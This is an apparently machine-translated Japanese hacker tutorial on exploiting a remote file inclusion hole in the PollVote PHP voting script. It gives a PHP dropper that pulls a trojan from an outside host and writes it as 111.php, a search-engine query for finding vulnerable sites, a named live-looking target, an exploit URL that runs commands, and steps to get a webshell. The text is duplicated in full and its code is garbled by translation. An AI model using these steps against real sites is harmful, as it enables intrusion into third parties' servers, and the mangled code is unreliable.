PollVote投票システムの脆弱性利用
PollVoteは投票システムです。今日は安全ではない雑誌を読みました。利用方法を見ました。
しかし、利用過程は煩雑で、肝心な時にははっきり言っていないと筆者は言っています。
簡単に言ってください
まず2つのテキストを作成します。 それぞれcreatfile.txtとphpdoor.txtです。
creat file.txt内容は書きます。
<?
$f=file_ゲットするコンテントhttp://www.hackeroo.com/phpdoor.txt");
$ff=fopen(「111.php」、「a」)
fwrite ($f f,$f);
fclose($ff)
?
phpdoor.txtの内容はPHP木馬を書きます。
その後はhttp://www.google.com 検索キーワード「pollvote.php?pollname」
たくさんあります
検索しますhttp://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg
彼です
EXPはhttp://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gifcmd=ls
これは利用原理です。
先ほど話したcreatfile.txtとphpdoor.txtのこの2つのファイルは全部自分の空間にアップロードします。
実行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt
このように
phpdoor.txtの内容は111.phpを生成します。
これでWEBSHELLをもらいます。
http://www.skinnyturd.co.uk/poll/111.php
しかし、利用過程は煩雑で、肝心な時にははっきり言っていないと筆者は言っています。
簡単に言ってください
まず2つのテキストを作成します。 それぞれcreatfile.txtとphpdoor.txtです。
creat file.txt内容は書きます。
<?
$f=file_ゲットするコンテントhttp://www.hackeroo.com/phpdoor.txt");
$ff=fopen(「111.php」、「a」)
fwrite ($f f,$f);
fclose($ff)
?
phpdoor.txtの内容はPHP木馬を書きます。
その後はhttp://www.google.com 検索キーワード「pollvote.php?pollname」
たくさんあります
検索しますhttp://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg
彼です
EXPはhttp://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gifcmd=ls
これは利用原理です。
先ほど話したcreatfile.txtとphpdoor.txtのこの2つのファイルは全部自分の空間にアップロードします。
実行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt
このように
phpdoor.txtの内容は111.phpを生成します。
これでWEBSHELLをもらいます。
http://www.skinnyturd.co.uk/poll/111.php